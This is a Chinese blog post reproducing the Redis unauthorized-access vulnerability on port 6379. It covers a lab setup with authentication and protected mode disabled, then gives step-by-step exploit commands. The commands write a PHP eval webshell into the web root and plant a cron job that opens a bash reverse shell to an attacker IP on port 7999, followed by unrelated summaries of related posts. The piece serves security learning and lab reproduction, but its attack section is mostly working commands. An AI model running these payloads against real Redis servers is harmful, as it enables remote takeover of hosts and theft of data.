6379 Redis 未授权访问

最新推荐文章于 2024-08-05 11:35:55 发布
最新推荐文章于 2024-08-05 11:35:55 发布
阅读量647 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44664530/article/details/106090884
版权

漏洞产生原因
网络管理员安装Redis,没有修改默认端口,没有设置密码。
环境搭建

//下载压缩包
wget http://download.redis.io/releases/redis-3.2.11.tar.gz
//解压
tar xzf  redis-3.2.11.tar.gz
//进入解压目录
cd redis-3.2.11
make
//进入src目录
cd src
//拷贝redis-server到/usr/bin
cp redis-serrver /usr/bin
//拷贝redis-cli到/usr/bin
cp redis-cli /usr/bin
cd..
//拷贝redis.conf到/etc/
cp redis.conf /etc
//编辑redis文件允许远程登录redis
vi /etc/redis.conf

前面加#注释:
在这里插入图片描述

关闭保护:在这里插入图片描述

//启动
redis-server /etc/redis.conf

复现
这里使用win进行测试,打开cmd输入以下命令:

redis-cli.exe -h 192.168.10.32
//查看redis信息及服务器信息
info

连接成功
在这里插入图片描述

//写入小马
set one "\n\n\n<?php @eval($_POST['c']);?>\n\n\n"
config set dir  /var/www/html/
config set dbfilename w.php

//反弹shell
192.168.31.62:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.31.117/7999 0>&1\n"
OK
192.168.31.62:6379> config set dir /var/spool/cron/
OK
192.168.31.62:6379> config set dbfilename root
OK
192.168.31.62:6379> save

参考文献:https://blog.csdn.net/qq_36119192/article/details/84620648

曈曚
关注
专栏目录
Redis授权访问漏洞记录(端口:6379、Linux、Windows)
墨痕诉清风的博客
11-12 7179
这就让黑客有了可乘之机,黑客可以远程连接到该数据库。但随着现代的服务部署方式的不断发展,组件化成了不可逃避的大趋势,docker就是这股风潮下的产物之一,而在这种部署模式下,一个单一的容器中不会有除 redis以外的任何服务存在,包括sh和 crontab,再加上权限的严格控制,只靠写文件就很难再 getshell了,在这种情况下,我们就需要其他的利用手段了。并且可以在 /root/.ssh/ 目录下看到我们上传的 authorized_keys 文件,正是由于这个文件的存在,我们才可以在本地用私钥登录。.
redis授权
weixin_47224111的博客
10-16 2926
0X01redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set()、zset(sorted set –有序)和hash(哈希类型)。 redis很大程度补偿了memcached这类key/value存储的不足,在部分场合可以对关系数据库起到很好的补充作用。它提供了Java,C/C++,C#,PHP,JavaScript,Perl,Object-C,Python,Ruby,Erlang等客户
redis授权访问
尘玥的故事
06-13 416
redis 默认情况下,绑定在 0.0.0.0:6379,若没有采用相关的策略,如添加防火墙规则避免其他非信任来源 ip 访问等,会将 redis 服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 redis 以及读取 redis 的数据。
Redis-6379-整数集合-是集合键的底层实现之一
平凡的脚步也可以走完伟大的行程
05-24 258
整数集合 整数集合(intset)是集合键的底层实现之一: 当一个集合只包含整数值元素, 并且这个集合的元素数量不多时, Redis 就会使用整数集合作为集合键的底层实现。 如果我们创建一个只包含五个元素的集合键, 并且集合中的所有元素都是整数值, 那么这个集合键的底层实现就会是整数集合: redis> SADD numbers 1 3 5 7 9 (integer) 5 red...
redis 6379 对外攻击_redis漏洞复现
weixin_35989968的博客
01-14 2475
一、漏洞简介什么是redisredis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问
xuanlanxiao的博客
05-10 509
攻击者在授权访问Redis的情况下,利用Redis自身提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh/authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。可以简单看一下这些,原因很简单,因为centos7自身存在防火墙,会将redis默认端口6379隐藏,不允许外界访问,所以这里kali访问失败,我们关掉centos7的防火墙再试一试。自己搭建的靶场可以拉拽redis压缩包进入虚拟机里。
Redis授权访问漏洞
周星星的博客
08-22 1581
Redis授权访问漏洞复现以及利用
Redis端口为什么是6379?
热门推荐
corleone_4ever的博客
01-30 1万+
先介绍下redis的作者Salvatore Sanfilippo(Antirez),意大利人,就是下图这位。 Antirez现在已经40多岁了,依然奋斗在代码一线,为开源社区做贡献。Antirez出生在非英语系国家,所以英语一直是他的短板。他曾经写过一篇博文,《英语伤痛 15 年》,以自己的实际经历鼓励非英语系国家的程序员突破英语障碍。或说回来,在他的另一篇博文《Redis as an...
授权访问漏洞合集
最新发布
weixin_53198216的博客
08-05 1677
授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。日录遍历目前主要存在授权访问漏洞的有:NFS 服务,Samba服务,LDAP,Rsync,FTPGitLab,Jenkins,MongoDB, Redis, ZooKeeper, ElasticSearch, Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo 等...
为什么redis的端口号是6379
长风破浪会有时的博客
04-20 404
你知道电脑上的应用程序是怎么互相说话的吗?每个应用程序都有一个或多个端口,就像我们每个人都有一个电话号码一样。当其他应用程序想要和Redis说话时,它们就会拨打6379这个“电话号码”。Redis的创造者选择6379作为Redis的端口号,可能是因为这个数字看起来比较顺眼,容易记住,而且没有被其他常用的应用程序占用。这样,当Redis在电脑上运行时,它就可以顺利地通过6379这个端口号和其他应用程序交流了。其实,这个数字并没有特别的魔法,它只是一个被Redis的创造者选定的数字。
redis授权访问漏洞利用
zkaqlaoniao的博客
11-16 449
对之前使用nmap扫描到的80端口进行访问,发现了一个页面,判断存在web服务,尝试使用扫描工具对目录进行一个探测。探测到靶机开放了多个端口,其中存在redis服务的6379端口,开始尝试是否存在redis授权访问漏洞。利用之前已经远程连接到的redis数据库,利用写入备份文件的方式,在这个地方可以尝试写入一句话木马。编译后的redis-cli文件存放在src目录中,将其复制到bin目录下,就可以在任意位置执行。将公钥写入到foo.txt文件中,前后使用换行,必然和其他符号连接产生其他不可预知错误。
redis虚拟机端口6379拒绝访问解决方法
l2x1314258的博客
06-10 2013
$ cd /etc/redis $ chomd 777 redis.conf $ vim redis.conf #把bind 127.0.0.1 ::1 改成 bind:0.0.0.0 重启redis $ sudo /etc/init.d/redis-server restart
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3887
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
数据库安全Redis 授权访问漏洞 测试.(6379端口)
网络安全领域___专研者.
05-27 1957
Redis 默认情况下绑定在 6379 端口,然后如果没有进行添加防火墙规则避免其他非信任来源 IP访问等相关安全策略,直接暴露在公网上。然后再没有设置密码或者设置了弱密码,因此导致此漏洞的产生.
Redis数据库授权访问漏洞的三种利用方式
zh的博客
10-22 3705
漏洞描述: 由于Redis默认是运行在TCP的6379端口上,而且默认安装没有设置用户访问认证,也没有访问IP限制,这样导致端口开放后,对Redis服务可以直接匿名访问,并且可对数据库进行匿名操作,信息泄露,执行命令等操作。 一、Redis数据库安装 虚拟机CentOS7,Xshell连接,拷贝安装包,解压 cd 看看有什么 src 源码所在的文件夹 安装编译工具:make 和 gcc 记得选Y 安装完成 进入src目录,执行命令:make 编译完...
redis授权访问漏洞
ad12456的博客
05-12 2954
漏洞场景: Redis 4.x/5.x 授权访问漏洞: 因配置不当可以授权访问,攻击者无需认证就可以访问到内部数据,其漏洞可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据,攻击者还可通过 EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。如果Redis以root身份运行,可以给root账户写入SSH公钥文件,直接免密码登录服务器。 还能被利用去挖矿。 Redias: Redis的常见数据类型: ①: String:字符和整型。 缓存、分布式session、分布式锁、全局ID
Fatal error, can‘t open config file ‘xxx‘: Permission denied
weixin_44989150的博客
07-06 6478
Fatal error, can’t open config file ‘/usr/redis/redis.conf’: Permission denied docker启动redis,用本地配置文件出现错误:Fatal error, can’t open config file ‘/usr/redis/redis.conf’: Permission denied 原因:本地的配置文件权限不足,给所属人,所属组,其他人都加上执行权限就可以 命令:chomd 755 文件名 ...
Redis授权访问与SSH key利用分析
"Redis授权访问配合SSH key文件利用详解" 本文主要探讨了Redis授权访问安全风险,以及如何利用这种漏洞配合SSH key文件进行恶意活动。Redis是一个高性能的键值存储系统,常用于缓存和数据持久化,但其默认...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值